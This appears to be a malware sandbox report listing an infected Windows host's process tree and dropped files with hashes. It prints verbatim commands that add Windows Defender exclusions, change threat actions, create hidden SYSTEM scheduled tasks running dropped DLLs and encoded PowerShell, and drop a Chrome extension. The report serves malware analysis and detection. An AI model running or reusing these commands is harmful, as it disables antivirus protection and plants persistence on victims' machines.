C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:324⤵PID:2164
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PqbaBdNutUHU2" /t REG_DWORD /d 0 /reg:644⤵PID:904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:324⤵PID:972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lExdmLMBU" /t REG_DWORD /d 0 /reg:644⤵PID:620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:324⤵PID:1236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ruvdGviMRzUn" /t REG_DWORD /d 0 /reg:644⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:324⤵PID:1976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tcAZjUgKvOkyC" /t REG_DWORD /d 0 /reg:644⤵PID:2976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:324⤵PID:1296
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR" /t REG_DWORD /d 0 /reg:644⤵PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:324⤵PID:2096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\ypvfxRdiVpdIIEVB" /t REG_DWORD /d 0 /reg:644⤵PID:1536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1668
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:324⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\QJyOOZntLhEYOJVTw" /t REG_DWORD /d 0 /reg:644⤵PID:2580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:324⤵PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\TtNtWPRQARDvDBvI" /t REG_DWORD /d 0 /reg:644⤵PID:2620
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giffBDFki" /SC once /ST 21:28:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giffBDFki"3⤵PID:2496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giffBDFki"3⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:2916
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1460
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1688
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1264
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YoRBImjUnYbxcjeUQ" /SC once /ST 06:13:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\TtNtWPRQARDvDBvI\CoQKczfmRejQhlk\lnsBcGR.exe\" 1b /WXfjdidgg 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1000
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "YoRBImjUnYbxcjeUQ"3⤵PID:2172
-
-
-
C:\Windows\Temp\TtNtWPRQARDvDBvI\CoQKczfmRejQhlk\lnsBcGR.exeC:\Windows\Temp\TtNtWPRQARDvDBvI\CoQKczfmRejQhlk\lnsBcGR.exe 1b /WXfjdidgg 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1220 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2888
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:676
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2228
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2452
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2052
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2252
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2240
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2880
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:480
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1880
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:532
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1964
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:1412
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1664
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:1584
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1784
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "baOmDneVXoOuKLmJPZ"3⤵PID:2116
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵PID:2064
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵PID:688
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵PID:1716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2924
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2908
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1416
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\lExdmLMBU\wHsUjx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kRLTqYWysAZjVOw" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1604
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kRLTqYWysAZjVOw2" /F /xml "C:\Program Files (x86)\lExdmLMBU\TqEKbTe.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "kRLTqYWysAZjVOw"3⤵PID:1060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kRLTqYWysAZjVOw"3⤵PID:1876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ykUuPKxmqaQUII" /F /xml "C:\Program Files (x86)\PqbaBdNutUHU2\xTItakc.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ulpCfKOOGSKos2" /F /xml "C:\ProgramData\ypvfxRdiVpdIIEVB\UiIcUpp.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FvvOAjPOJzCKoDLGH2" /F /xml "C:\Program Files (x86)\vTGqftCYFnqsQTavPzR\yjEkrSQ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WDMUNxCrfDqnCNrbnrT2" /F /xml "C:\Program Files (x86)\tcAZjUgKvOkyC\EUUntFm.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2248
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qZvWQJXUOVWXUoxnV" /SC once /ST 18:25:15 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\TtNtWPRQARDvDBvI\ahMvDhWI\KqPuAdO.dll\",#1 /cdidoEnc 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qZvWQJXUOVWXUoxnV"3⤵PID:1500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YoRBImjUnYbxcjeUQ"3⤵PID:1532
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TtNtWPRQARDvDBvI\ahMvDhWI\KqPuAdO.dll",#1 /cdidoEnc 5254032⤵PID:1420
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\TtNtWPRQARDvDBvI\ahMvDhWI\KqPuAdO.dll",#1 /cdidoEnc 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2316 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qZvWQJXUOVWXUoxnV"4⤵PID:2084
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F8A69052-3223-4C05-B489-279C5E3EB72D} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]1⤵PID:1132
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1236
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:876 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1544
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2952 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2712
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:944
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2736
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2680
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58df6081425d906f8a01773c123c528a5
SHA1fa05ff63008b8f13007dc3dca496626ad5480c9d
SHA25622369283950c9999d9d9c5beffbdbe78106d3562ecca62163d04c9986b0aa5d2
SHA5121a27b505cb68d219117c90478212fdcdb73d1e165aa2b19b2638168d2ba6646b2dbce62e8f809e093730424cd95c0d44ae1ee7399cfd87e4862ba275660e2b95
-
Filesize
2KB
MD545ea8fa7fa2c1898255081f94824bd47
SHA1515e90b4c16f22353958c4804e07d53e7fbf0945
SHA256514cefe1f8d58644a826ddf18c5c990d6bd72105bb55f9e8f651c5d3f3396e5e
SHA512d1593c45e8b7ecc4e48dfa83fe1ca02b614028183dc0c39f924445cd440aefabe9892891ae00f6f4dc7227fdf58041f5ceff571cf273a0c0813aeb4c8c28cdbe
-
Filesize
2KB
MD5dbf59117f32e00a746439bdf134baad5
SHA1d915b69a07ef999b9fe206c4ee1cbabf859aa35a
SHA256736a04e733fc2c3427b29ef2b534c9bcd474294b73c027e41b6c88af9efaec9a
SHA5128cba43a0ead8e9dfc986fc95d9bb99d7c1a20c2610297b0a496e0af87741e822a8747cf8d9176b0b528530c8bd469d8a73d32b6fddc42b2ecc2885953569edc8
-
Filesize
2KB
MD586dc552df7b2e46f878638d7658b44f0
SHA1f084db8f2f61f70cd5d04b1a25980c27919cc00e
SHA256000125a6ee4cd05223fa1b6b7d0aa80a0d9ff73756ad76b336f1724578430710
SHA5121d7373f5d0d1d1059523138475278fc32adb5a5591f7af80b4f429236c9ac15e13d67bf94845e8ab362046c69f47d91eb71d63762ae699a1cc9b03bcf1577fbf
-
Filesize
2.0MB
MD584889dfaf43e97433e088502a3163093
SHA141b63ddc73b48813f36a125fea5979722dff2abe
SHA2566ccfa57bbe6796101fbf93296f43ffe10d106cacef550045bed919dd78d40720
SHA5120c4ba817f07363f476dfed5d81132428bf050ab3052601a5680f74cea6e717209cb8916b8f39c2b239b24c01231459289d9c3e340c07a5e6b8f351012cdf3527
-
Filesize
2KB
MD5493b05377c316566531213f432a3f757
SHA184306d04648df0485475297c72562bb6f03af8f8
SHA2568d5c42f951c2e15bd604005fede765dc3d5b8478f8e7839bb498ec3b05bebdd7
SHA51208ae4ee6e997db52967cf3600f49744a628c51e8302a239a1f43f45d7aa67b2933de208fc1bd776b3645b50224ead42d47aaa6cc653bed6c2e90bf2d82ef61f4
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5b4ddcc48e84be8c001b44c1540ce7014
SHA12a228014044aba37c90cdc81759c3ebb599edfb5
SHA2569bf3b4a5819797bf0310ceac753a222441fd6a7eee66bb2ca35a741e3bd05bad
SHA51264ad273ae4ef2b0ba9556966439f46dac33cdffaea34f07e2f77ad0253a3135d3206db7443569b392d46590ffa0200c691d48548cfe3f6a32eb9f3022bd90201
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD523ee8c3543ed00cfd6da0775f2fbe776
SHA1c5cd347da866455e5cb0c6fd891b55ceead86c7a
SHA256dfe7894d5bafde3bc3d2ef4eccd88c89ef6ff95b796ae91ad4b1e6646a44ffe3
SHA512f26256d7df39c03bac5b587b53f1a5f1614f2a31231273c86b777ecd3a28352be01cbc6a89c73edf5ae405075d6486b8809c860235536bbfeb58dfbafaf5ffe0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57bb77261c28723e06084ba24578969b7
SHA1d4df9bfcd9c479b2317e20ff69654d35fdad238a
SHA2565bca2738f68a0f923d123ac5e17919a7503991d2ed4b2a78044510293bd3ee7d
SHA512b4a5642c600e09cea335c0db7bbc0ddd2b2c26b04a1d7e54af5051a18ac4df94abb5cd1d0b5e01b0c2e275c8e61de1661073e8f6ab651ae672caa7ea8eef210f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD503d34e4f983a78ab02fbe40c73ebdc7c
SHA1e7ab5e0b59579096304aa7a84ca3bfdae20c3ba4
SHA256878067ba40067220936c0c4c74a24c563ed4c89ac73d596ee658fb107fe3238b
SHA512edcb21394a446da06344a5184e77aefd595f3baaded5440598c2e048b32398a8abd021ffc7b2ae7b6d9264729aa9538921db5ef0a611b327d85649ce7075c52c
-
Filesize
7KB
MD5c3c5529c9680a51c356340d049ce1ce8
SHA1c67477907a01258d5c3dc5aa71878c7a917d9cdc
SHA256370c0b4f278759e579b3c953ceb2a3baadab258420b0340e37bee23d19c53d35
SHA51227065d2be71a3545b2e290752fc3340cf9e306201d851d636956299ba040d1d0c74306447569d9c25aae33815683cd2420982049c7465963c255cdf0de3b8dcc
-
Filesize
6.3MB
MD50992428d66cec74bc5fce685223d1e2f
SHA1ade0387114a002e12df4c60fc785154a546f0941
SHA256104be79914569577f7894c46c99aed1c6ff33b5ebf2997f89484f602814597e2
SHA512c62cdf883b1497d6fb62860ea1a09fa95986500d4138038670741fb8baf2e5b2c06d2559eb1b4a5dedf8915d245356b12d15800d07bfee7aceda539f54dba7ad
-
Filesize
9KB
MD58ddeb743fe1cb9e83d11f1fde570a465
SHA14156b89074839a79b4f865ee8bca4a9aea742fcb
SHA256d39845178e305d2c4160e9828ce34698a58308a2cacb57f05d1802512d6033e9
SHA5128a5d11863b8bcdb317ee742283f8cce4704e670320d55ad0621907cdd874ef08a5809d2bc64865d238679ec27b4d96072a8118e40df2ee181ea10f238a7b2ca8
-
Filesize
6KB
MD5bc1c3eaf843f5b07b1c5a056fa072886
SHA10e5a01d852df252a4fcdd10d7f3427a9ee58dfe8
SHA256d9c1645e2cb2d57d579d29d29ba02ea7b0eab30f76850c1ff1a5c6f68f8460de
SHA512c4e11b9d53f7bf48862e74a71b9d99e5e94e71aaa2a2ef3bfa697af7bdbfb507965d698c60c491d1ab47b42fe0bfcbd37f998d151a9db9cebe39b5920b4f5f0f
-
Filesize
6.3MB
MD51c8a69a1ebd9f4bb930bb8f7872a1eb8
SHA13dd259ee0b6594c3ca51bb858be35691c5b16135
SHA25663a0ad4c41c52c90e081397f661b472539a40ec5d143afac7779e9920880408f
SHA5123389a342a68a4b7f33c54025cce6e1034784d8331f0096eb042a8de66ceca98d5b5618ded0a8bdba631d2480d32c2d56ca1506c576290404035408b4feb44040
-
Filesize
6.5MB
MD5f7314b2d766560a50615e322c6bc9ce4
SHA1609db2977591e1ba9667ce40e8a3d60cd3fd97c6
SHA256d140cad5c083db25197caecaee2e5646d9215799412a6b94950d941b17393197
SHA51288b8f81871d9a797c2f0ef6e50a5ea6bc28e6f735d0c9ad2704465e46596b2743d2f8645266a0f8f3cc19abad27d6757ccebe98192a66ef0486dea286a314e50